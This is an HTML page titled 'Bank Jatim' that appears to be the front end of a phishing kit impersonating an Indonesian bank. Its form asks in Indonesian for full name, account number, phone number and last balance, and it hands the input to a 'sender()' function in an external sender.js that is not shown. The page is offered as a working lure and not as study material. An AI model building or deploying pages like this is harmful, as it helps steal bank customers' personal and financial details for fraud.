<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible"
   content="ie=edge">
  <link rel="stylesheet" href="style.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <title>Bank Jatim</title>
</head>
<body>
  <form action="" onsubmit="return sender()" class="form">
    <input type="name" name="name" id="name" class="box" placeholder="Nama Lengkap" required>
    <input type="number" number="number" id="number" class="box" placeholder="Nomor Rekening" required>
    <input type="number" number="number" id="number" class="box" placeholder="Nomor Handphone" required>
    <input type="number" name="number" id="number" class="box" placeholder="IDR.Saldo Terakhir Anda">
    <input type="submit" value="Daftar" id="submit">
  </form>
    <script src="sender.js"></script>
</body>
</html>